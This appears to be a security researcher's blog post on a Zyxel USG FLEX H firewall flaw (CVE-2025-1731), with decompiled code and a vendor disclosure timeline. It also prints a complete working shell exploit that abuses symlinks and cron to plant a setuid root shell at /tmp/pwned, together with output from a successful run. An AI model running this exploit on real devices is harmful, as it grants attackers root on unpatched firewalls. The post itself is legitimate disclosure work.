{"id":5313,"date":"2025-04-23T07:27:16","date_gmt":"2025-04-23T05:27:16","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=5313"},"modified":"2025-10-21T09:01:44","modified_gmt":"2025-10-21T09:01:44","slug":"local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","title":{"rendered":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)"},"content":{"rendered":"<blockquote><p><em>&#8220;So we wait, this is our labour&#8230; we wait.&#8221;<\/em><br \/>\n<em>&#8212; Anthony Swofford on fuzzing<\/em><\/p><\/blockquote>\n<h3>TL;DR<\/h3>\n<p>The <a href=\"https:\/\/support.zyxel.eu\/hc\/en-us\/sections\/17702103398546-Series-USG-FLEX-H\">Zyxel USG FLEX H Series<\/a> is a high-performance <strong>firewall<\/strong> series designed to meet the needs of demanding and high-speed networks. It\u00a0offers faster boot times and improved CPU performance, making it superior to the standard USG FLEX Series.<\/p>\n<p>I&#8217;ve identified some <strong>security vulnerabilities<\/strong> in the Zyxel uOS Linux-based operating system distributed with these appliances, which allow local users with access to a Linux OS shell to <strong>escalate privileges to root<\/strong>. 
They were collectively assigned <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1731\">CVE-2025-1731<\/a> (see below for additional details).<\/p>\n<p>The <strong>full advisory<\/strong> and proof-of-concept <strong>exploit<\/strong> are available on GitHub:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt\">https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion\">https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion<\/a><\/li>\n<\/ul>\n<p>Zyxel&#8217;s <strong>official advisory<\/strong> and <strong>patches<\/strong> can be found at the following links:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025<\/a><\/li>\n<li><a href=\"https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release\">https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release<\/a><\/li>\n<\/ul>\n<p>This research is the result of a <strong>collaboration<\/strong> with <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> of <a href=\"https:\/\/hackerhood.redhotcyber.com\/\">HackerHood<\/a>. 
See also his advisory at:<\/p>\n<ul>\n<li><a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732<\/a><\/li>\n<\/ul>\n<h3>Background<\/h3>\n<p>Because of my <a href=\"https:\/\/hnsecurity.it\/multiple-vulnerabilities-in-zyxel-zysh\/\">previous research<\/a> on <strong>Zyxel appliances<\/strong>, after discovering a <strong>remote command execution vulnerability<\/strong> in the latest USG FLEX H Series (<a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">CVE-2025-1731<\/a>), <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> contacted me to ask for help with <strong>finding local privilege escalation vectors<\/strong>.<\/p>\n<figure id=\"attachment_5586\" aria-describedby=\"caption-attachment-5586\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-5586 size-large\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel_cert-e1744614763195-2-1024x655.png\" alt=\"\" width=\"640\" height=\"409\" \/><figcaption id=\"caption-attachment-5586\" class=\"wp-caption-text\">The prestigious Certificate of Recognition I got for my 2022 research on Zyxel devices<\/figcaption><\/figure>\n<p>Since USG FLEX H Series devices are based on a <strong>new AArch64 hardware<\/strong> and ship with a completely <strong>revamped Linux-based operating system<\/strong> (Zyxel uOS) that is supposed to be &#8220;secure by default&#8221; (a claim reminiscent of Oracle&#8217;s &#8220;unbreakable&#8221; <a href=\"https:\/\/www.zdnet.com\/article\/oracles-unbreakable-toy-story\/\">marketing campaign<\/a> in the days of yore), I couldn&#8217;t resist giving it a try&#8230; I quickly identified a <strong>viable privilege escalation vector<\/strong> related to the <em>Recovery Manager<\/em> functionality (<a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1732\">CVE-2025-1732<\/a>) that was reported to the vendor by Alessandro together 
with <a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">his other findings<\/a>.<\/p>\n<p>However, I wasn&#8217;t done yet. Since Alessandro kindly provided access to his USG FLEX 100H test device, I decided to keep looking for some other low-hanging fruit, as an excuse to battle-test my new <a href=\"https:\/\/hnsecurity.it\/streamlining-vulnerability-research-with-ida-pro-and-rust\/\"><em>vulnerability divination<\/em> suite<\/a> written in <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">Rust<\/a>. I started by examining <strong>setuid root binaries<\/strong> distributed with the OS.<\/p>\n<h3>Vulnerabilities<\/h3>\n<p>The custom setuid root binary <strong><em>\/usr\/sbin\/fermion-wrapper<\/em> follows symbolic links in the <em>\/tmp<\/em> directory<\/strong> when run with the <em>register-status<\/em> argument. This allows local users with access to a Linux OS shell to <strong>trick the program into creating writable files at arbitrary locations<\/strong> in the filesystem. This vulnerability can be exploited to <strong>overwrite arbitrary files<\/strong> or <strong>locally escalate privileges<\/strong> from a low-privileged user (e.g., <em>postgres<\/em>) to root.<\/p>\n<p>In addition, I identified a second issue in the filesystem: <strong>the <em>\/tmp<\/em> directory doesn&#8217;t have the sticky bit set<\/strong>. 
This small, overlooked detail simplifies exploitation of the <em>fermion-wrapper<\/em> vulnerability and may also open the door to <a href=\"https:\/\/en.wikipedia.org\/wiki\/Sticky_bit\">all sorts of havoc<\/a>.<\/p>\n<h3>Analysis<\/h3>\n<p>I leveraged my <a href=\"https:\/\/github.com\/0xdea\/haruspex\">haruspex<\/a> and <a href=\"https:\/\/github.com\/0xdea\/oneiromancer\">oneiromancer<\/a> tools to streamline the <strong>binary audit workflow<\/strong>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">raptor@fnord Downloads % haruspex fermion-wrapper\r\nharuspex 0.4.1 - Tool to extract IDA decompiler's pseudo-code\r\nCopyright (c) 2024-2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Trying to analyze binary file \"fermion-wrapper\"\r\n[+] Successfully analyzed binary file\r\n\r\n[-] Processor: ARM Little-endian\r\n[-] Compiler: GNU\r\n[-] File type: ELF\r\n\r\n[*] Preparing output directory \"fermion-wrapper.dec\"\r\n[+] Output directory is ready\r\n\r\n[*] Extracting pseudo-code of functions...\r\n\r\n...\r\n\r\n[+] Decompiled 98 functions into \"fermion-wrapper.dec\"\r\n[+] Done processing binary file \"fermion-wrapper\"\r\n\r\nraptor@fnord Downloads % oneiromancer fermion-wrapper.dec\/sub_4068AC@4068AC.c\r\noneiromancer 0.3.0 - GenAI assistant for C code analysis\r\nCopyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Analyzing source code in \"fermion-wrapper.dec\/sub_4068AC@4068AC.c\"\r\n[+] Successfully analyzed source code\r\n\r\n\/*\r\n * getDeviceRegistrationStatus()\r\n *\r\n * This function retrieves the registration status of a device and stores\r\n * it in provided pointers. It uses cURL to make an HTTP request to a\r\n * specific URL with various options set for authentication and certificate\r\n * verification. The response is parsed using JSON to extract relevant\r\n * information about the device's registration status. 
If successful,\r\n * it updates cache files and performs additional actions based on the\r\n * registration status.\r\n *\/\r\n\r\n...\r\n\r\n[*] Saving improved source code in \"fermion-wrapper.dec\/sub_4068AC@4068AC.out.c\"\r\n[+] Done analyzing source code\r\n\r\nraptor@fnord Downloads %<\/pre>\n<p>I ended up with the following relevant <strong>pseudo-code<\/strong> for the <em>sub_4068AC <\/em>function, that is called directly by <em>main<\/em>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"minimal\" data-enlighter-highlight=\"38\">__int64 __fastcall sub_4068AC(_DWORD *isRegistered, _DWORD *isNeoAgentRegistered, _DWORD *bundleLicenseStatus)\r\n{\r\n...\r\n  requestUrl = \"https:\/\/he.myzyxel.com\/v1\/device\/status\";\r\n  jsonData = 0LL;\r\n  operationResult = -1;\r\n  statusCheckResult = 7;\r\n  if ( geteuid() )\r\n    sub_4072FC(\"\/usr\/bin\/sudo\", \"\/usr\/bin\/sudo\", \"\/usr\/bin\/touch\");\r\n  bufferSize = sub_4067DC(deviceName, 20);\r\n  curlHandle = curl_easy_init(bufferSize);\r\n  if ( curlHandle )\r\n  {\r\n    bioMemHandle = BIO_s_mem();\r\n    bioHandle = BIO_new(bioMemHandle);\r\n    if ( bioHandle )\r\n    {\r\n...\r\n      errorCode = curl_easy_perform(curlHandle);\r\n      if ( !errorCode )\r\n      {\r\n        jsonData = (unsigned __int64 *)json_load_callback(sub_406878, bioHandle, 0LL, &amp;jsonDataPointer);\r\n        if ( jsonData )\r\n        {\r\n          statusValue = (_DWORD *)json_object_get(jsonData, \"register\");\r\n...\r\n          if ( !operationResult )\r\n          {\r\n            statusCheckResult = 0;\r\n            statusCode = 2 * (2 * *isRegistered + *isNeoAgentRegistered) + *bundleLicenseStatus;\r\n            fileStream = fopen(\"\/share\/neoagent\/cache_register_status\", \"w\");\r\n            if ( fileStream )\r\n            {\r\n              fprintf(fileStream, \"%s\\n\", deviceName);\r\n              fprintf(fileStream, \"%d\\n\", statusCode);\r\n              
fclose(fileStream);\r\n            }\r\n            fileStream = fopen(\"\/tmp\/register_status\", \"w\"); \/\/ VULN\r\n            if ( fileStream )\r\n            {\r\n              fprintf(fileStream, \"%s\\n\", deviceName);\r\n              fprintf(fileStream, \"%d\\n\", statusCode);\r\n              fclose(fileStream);\r\n            }\r\n            sub_406518(statusCheckResult, deviceName, errorCode);\r\n            if ( !access(\"\/usr\/sbin\/dha_send_fsync\", 0) )\r\n            {\r\n              sub_4072FC(\"\/usr\/sbin\/build_dha_cert_neoagent.sh\", \"\/usr\/sbin\/build_dha_cert_neoagent.sh\", 0LL);\r\n              sub_4072FC(\"\/usr\/sbin\/dha_send_fsync\", \"\/usr\/sbin\/dha_send_fsync\", \"8\");\r\n            }\r\n          }\r\n...<\/pre>\n<p>Unsurprisingly, the vulnerability lies in the highlighted line marked with <em>VULN<\/em> \ud83d\ude44\u00a0<strong>The binary running with elevated privileges can be tricked into following a symbolic link<\/strong> placed in <em>\/tmp\/register_status<\/em> by a local low-privileged user.<\/p>\n<p>As mentioned earlier, exploitation is simplified by the <strong>lack of sticky bit<\/strong> in the filesystem permissions of the <em>\/tmp<\/em> directory. This allows an attacker to replace any existing <em>\/tmp\/register_status<\/em> file even if it&#8217;s owned by another user, including root:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">$ ls -ld \/tmp\r\ndrwxrwxrwx 30 root root 2240 Feb 27 18:16 \/tmp # \u00af\\_(\u30c4)_\/\u00af<\/pre>\n<h3>Exploitation<\/h3>\n<p>I&#8217;ve crafted a <strong>proof-of-concept<\/strong> <a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/zyxel\/raptor_fermion\">exploit<\/a> that demonstrates how to achieve <strong>local privilege escalation<\/strong>. 
You can use it as follows:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"minimal\" data-enlighter-linenumbers=\"false\">$ .\/raptor_fermion\r\nraptor_fermion - Zyxel fermion-wrapper root LPE exploit\r\nCopyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\r\n\r\n[*] Exploiting \/usr\/sbin\/fermion-wrapper\r\n$ uname -a\r\nLinux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU\/Linux\r\n$ id\r\nuid=502(postgres) gid=502(postgres) groups=502(postgres)\r\n$ ls -l \/usr\/sbin\/fermion-wrapper\r\n-rwsr-xr-x 1 root root 44288 Jan  9 05:34 \/usr\/sbin\/fermion-wrapper\r\n{\"status\": 0, \"registered\": 1, \"nebula_registered\": 1, \"bundle\": 1}\r\n\r\n[+] Everything looks good \\o\/, wait an hour and check \/tmp\/pwned\r\n$ ls -l \/etc\/cron.d\/runme\r\n-rw-rw-rw- 1 root postgres 79 Feb 14 15:52 \/etc\/cron.d\/runme\r\n$ cat \/etc\/cron.d\/runme\r\n* * * * *   cp \/bin\/sh \/tmp\/pwned; chmod 4755 \/tmp\/pwned; rm \/etc\/cron.d\/runme\r\n\r\n[+] Run the shell as follows to bypass bash checks: \/tmp\/pwned -p\r\n\r\n[about one hour later...]\r\n\r\n$ ls -l \/tmp\/pwned\r\n-rwsr-xr-x 1 root root 916608 Feb 14 16:25 \/tmp\/pwned\r\n$ \/tmp\/pwned -p\r\n# id\r\nuid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)\r\n# R00t D4nc3!!!111! 
\\o\/<\/pre>\n<p>Here&#8217;s a screenshot for your viewing pleasure:<\/p>\n<p><a href=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel-fermion1-e1744357609522-1.png\"><img decoding=\"async\" class=\"aligncenter wp-image-5528 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/04\/zyxel-fermion1-e1744357609522-1.png\" alt=\"\" width=\"2940\" height=\"1660\" \/><\/a><\/p>\n<p>And here&#8217;s the exploit code:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bash\" data-enlighter-theme=\"minimal\" data-enlighter-highlight=\"20\">#!\/bin\/sh\r\n\r\necho \"raptor_fermion - Zyxel fermion-wrapper root LPE exploit\"\r\necho \"Copyright (c) 2025 Marco Ivaldi &lt;raptor@0xdeadbeef.info&gt;\"\r\necho\r\n\r\ntarget=\"\/usr\/sbin\/fermion-wrapper\"\r\ntmpfile=\"\/tmp\/register_status\"\r\nrunme=\"\/etc\/cron.d\/runme\"\r\nshell=\"\/tmp\/pwned\"\r\n\r\necho \"[*] Exploiting $target\"\r\necho \"$ uname -a\"\r\nuname -a\r\necho \"$ id\"\r\nid\r\necho \"$ ls -l $target\"\r\nls -l $target\r\n\r\numask 0\r\nrm $tmpfile\r\nln -s $runme \/tmp\/register_status\r\n$target register-status\r\necho \"* * * * *   cp \/bin\/sh $shell; chmod 4755 $shell; rm $runme\" &gt; $runme\r\n\r\nif [ \"`cat $runme 2&gt;\/dev\/null`\" = \"\" ]; then\r\n        echo \"[!] Error: something went wrong \u00af\\\\_(\u30c4)_\/\u00af\"\r\n        exit 1\r\nfi\r\n\r\necho\r\necho \"[+] Everything looks good \\\\o\/, wait an hour and check $shell\"\r\necho \"$ ls -l $runme\"\r\nls -l $runme\r\necho \"$ cat $runme\"\r\ncat $runme\r\n\r\necho\r\necho \"[+] Run the shell as follows to bypass bash checks: $shell -p\"\r\necho<\/pre>\n<p>It should be straightforward to understand. 
Note how I pulled off the <a href=\"https:\/\/github.com\/0xdea\/exploits\/blob\/master\/solaris\/raptor_xscreensaver\">old-school<\/a> <strong><em>umask 0<\/em> trick<\/strong> (see the highlighted line above) to be able to control the content of the file created by the vulnerable setuid binary.<\/p>\n<p>Also note how for some reason files in <em>\/etc\/cron.d<\/em>\u00a0get <strong>processed every 50 minutes <\/strong>or so, instead of almost instantly as happens on a standard Linux distribution&#8230; I leave the quest of looking for a better exploitation vector as an exercise for you, dear reader \ud83d\ude09<\/p>\n<h3>Affected products<\/h3>\n<p>I confirmed the vulnerabilities in the following <strong>products and firmware versions<\/strong>:<\/p>\n<ul>\n<li>Zyxel USG FLEX 100H with Firmware Version 1.31(ABXF.0)<\/li>\n<li>Zyxel USG FLEX 200H with Firmware Version 1.31(ABWV.0)<\/li>\n<\/ul>\n<p>Other products and earlier firmware versions may also be vulnerable. Please refer to Zyxel&#8217;s official <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a> for additional information.<\/p>\n<h3>Remediation<\/h3>\n<p>During the whole coordinated disclosure process, Zyxel was very responsive.<\/p>\n<p>Unfortunately, despite my objections they <strong>insisted on using the already-assigned CVE-2025-1731 as the identifier for my local privilege escalation vulnerability<\/strong>. These are their statements in this regard:<\/p>\n<blockquote><p><em>&#8220;Our product team has identified that the attack surface of the local privileges escalation issue stems from an incorrect permission assignment within the PostgreSQL commands. This misconfiguration grants users with &#8216;postgres&#8217; privileges the ability to access the Linux shell. 
A similar issue was recently reported by another researcher, and CVE-2025-1731 has been reserved to identify the vulnerability.&#8221;<\/em><\/p>\n<p><em>&#8220;We kindly request any evidence demonstrating an alternative method to access the device&#8217;s Linux shell for executing the malicious scripts or the PoC exploit, &#8216;raptor_fermion,&#8217; that you previously shared. If such evidence is unavailable, we will proceed with using CVE-2025-1731 as the identifier for this issue.&#8221;<\/em><\/p>\n<p><em>&#8220;We could not identify any explicit evidence in your report that demonstrates an alternative method distinct from CVE-2025-1731 that would allow attackers to gain access to the Linux shell. Consequently, we have decided not to assign a separate CVE ID to the local privilege escalation issue, as it aligns with the attack surface of CVE-2025-1731. Nevertheless, we appreciate your finding and will ensure it is acknowledged in CVE-2025-1731.&#8221;<\/em><\/p><\/blockquote>\n<p>I regret any confusion caused by this decision.<\/p>\n<p>As for the <strong>lack of sticky bit in the <em>\/tmp<\/em> directory<\/strong>, Zyxel stated the following:<\/p>\n<blockquote><p><em>&#8220;We currently do not consider this a security issue. However, we are open to reevaluating if you can provide a clear example demonstrating how it could result in a denial of service (DoS) problem. Otherwise, we will treat this as an implementation flaw rather than a vulnerability.&#8221;<\/em><\/p><\/blockquote>\n<p>Please refer to Zyxel&#8217;s official <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a> for patching information. 
I have not checked the effectiveness of the fixes.<\/p>\n<h3>Disclosure timeline<\/h3>\n<p>The coordinated disclosure timeline follows:<\/p>\n<ul>\n<li><strong>2025-02-05<\/strong>: Alessandro Sgreccia contacted us to propose a collaboration.<\/li>\n<li><strong>2025-03-10<\/strong>: Zyxel PSIRT was notified via &lt;security@zyxel.com.tw&gt; and acknowledged receipt of our advisory and PoC exploit.<\/li>\n<li><strong>2025-03-17<\/strong>: Zyxel PSIRT communicated their intention of using the already-assigned <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-1731\">CVE-2025-1731<\/a> as the identifier for our local privilege escalation vulnerability.<\/li>\n<li><strong>2025-03-17<\/strong>: We disagreed with Zyxel PSIRT and explained that using an unrelated CVE identifier for our issues would likely cause confusion.<\/li>\n<li><strong>2025-03-18<\/strong>: Zyxel PSIRT confirmed their decision of not assigning a separate CVE ID to the local privilege escalation issue; they also stated that they don&#8217;t consider the lack of sticky bit in <em>\/tmp<\/em> a security issue, but simply an implementation flaw.<\/li>\n<li><strong>2025-04-15<\/strong>: Zyxel released <a href=\"https:\/\/community.zyxel.com\/en\/discussion\/28988\/usg-flex-h-series-v1-32patch-0-firmware-release\">version 1.32 of its firmware<\/a> that includes fixes for the reported vulnerabilities.<\/li>\n<li><strong>2025-04-22<\/strong>: Zyxel PSIRT published their <a href=\"https:\/\/www.zyxel.com\/global\/en\/support\/security-advisories\/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025\">security advisory<\/a>.<\/li>\n<li><strong>2025-02-22<\/strong>: Alessandro Sgreccia published his <a href=\"https:\/\/rainpwn.blog\/blog\/cve-2025-1731_cve-2025-1732\">security advisory<\/a>.<\/li>\n<li><strong>2025-04-23<\/strong>: We published our own <a 
href=\"https:\/\/github.com\/hnsecurity\/vulns\/blob\/main\/HNS-2025-10-zyxel-fermion.txt\">advisory<\/a> with full details.<\/li>\n<\/ul>\n<h3>Acknowledgments<\/h3>\n<p>I&#8217;d like to thank <a href=\"https:\/\/rainpwn.blog\/\">Alessandro Sgreccia<\/a> of <a href=\"https:\/\/hackerhood.redhotcyber.com\/\">HackerHood<\/a> for involving me in his research and for kindly providing access to his USG FLEX 100H test device.\u00a0I\u2019ve been on a break from vulnerability research and I was a bit <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">rusty<\/a> (pun intended), therefore this was a welcome diversion. It&#8217;s been a real pleasure working together!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;So we wait, this is our labour&#8230; we wait.&#8221; &#8212; Anthony Swofford on fuzzing TL;DR The Zyxel USG FLEX H [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":159969,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[78,81],"tags":[222,552,74,75,77,82,109],"class_list":["post-5313","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-vulnerabilities","tag-cve-2025-1731","tag-network","tag-0day","tag-advisory","tag-exploit","tag-vulnerability-research","tag-zyxel"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -<\/title>\n<meta name=\"description\" content=\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" 
href=\"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -\" \/>\n<meta property=\"og:description\" content=\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T05:27:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T09:01:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Marco Ivaldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marco Ivaldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"},\"author\":{\"name\":\"Marco Ivaldi\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\"},\"headline\":\"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)\",\"datePublished\":\"2025-04-23T05:27:16+00:00\",\"dateModified\":\"2025-10-21T09:01:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"},\"wordCount\":1317,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"keywords\":[\"cve-2025-1731\",\"network\",\"0day\",\"advisory\",\"exploit\",\"vulnerability research\",\"zyxel\"],\"articleSection\":[\"Exploits\",\"Vulnerabilities\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\",\"name\":\"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) 
-\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"datePublished\":\"2025-04-23T05:27:16+00:00\",\"dateModified\":\"2025-10-21T09:01:44+00:00\",\"description\":\"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/ZYXEL.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Zyxel Networks logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Local privilege escalation on Zyxel USG FLEX H Series 
